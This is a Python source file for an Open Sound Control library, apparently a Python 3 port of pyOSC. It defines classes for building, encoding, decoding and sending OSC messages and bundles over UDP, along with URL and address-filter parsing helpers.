Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from socketserver import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
# print ('Cannot import numpy in OSC.py')
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address=""):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument
"""
self.clear(address)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = b""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if isinstance(argument,dict):
argument = list(argument.items())
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__') and not type(argument) in (str,bytes):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(list(self.values())))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(list(self.values()))
if isinstance(values,tuple):
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = list(self.values())
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in list(self.values()))
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return list(self.values())[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = list(self.items())
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = list(values.items())
elif isinstance(values,list):
items = []
for val in values:
if isinstance(val,tuple):
items.append(val[:2])
else:
items.append((typehint, val))
elif isinstance(values,tuple):
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = list(self.items())
new_items = self._buildItemList(val)
if not isinstance(i,slice):
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = list(self.items())
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return list(self.values()).count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return list(self.values()).index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = list(self.items()) + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = list(self.items())
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = list(self.items())
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = list(self.items())
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = list(self.items())
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(list(self.values()))
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(list(self.items()))
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in list(self.values()):
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if isinstance(argument,dict):
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next).encode('latin1'))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if isinstance(next,str):
next = next.encode('latin1')
if isinstance(next,bytes):
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = b''
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', int(secs), int(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = data.find(b'\0')
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length].decode('latin1'), data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (int(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
if isinstance(bytes,str):
bytes = bytes.encode('latin1')
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % bytes[i]
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if isinstance(port,int):
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (isinstance(url,str) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
When the 'address' argument is given this client is connected to a specific remote server.
- address ((host, port) tuple): the address of the remote server to send all messages to
Otherwise it acts as a generic client:
If address == 'None', the client doesn't connect to a specific remote server,
and the remote address must be supplied when calling sendto()
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
if server == None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = None
else:
self.setServer(server)
self.client_address = None
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
if self.socket != None:
self.close()
self.socket = server.socket.dup()
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
return self.socket.getpeername()
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self.socket.connect(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
# print ('in OSC.py the @:',address,'is constitued of a', type(address[0]),'and a',type(address[1]))
try:
self.socket.connect(address)
varAvirer = msg.getBinary()
# print('***',varAvirer,'***')
self.socket.sendall(varAvirer)
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if isinstance(args,str):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in list(filters.keys()):
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in list(filters.values()):
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in list(filters.items()):
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = str.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in list(self.targets.keys()):
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in list(src.keys()): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in list(src.items()):
if (addr in list(dst.keys())) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in list(self.targets.keys()):
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if isinstance(filters,str):
(_, filters) = parseFilterStr(filters)
elif not isinstance(filters,dict):
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
elif (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if isinstance(address,tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in list(self.targets.keys()):
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in list(self.targets.items()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if isinstance(address,str):
address = self._searchHostAddr(address)
if (isinstance(address,tuple)):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in list(self.targets.keys())):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in list(dict.items()):
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
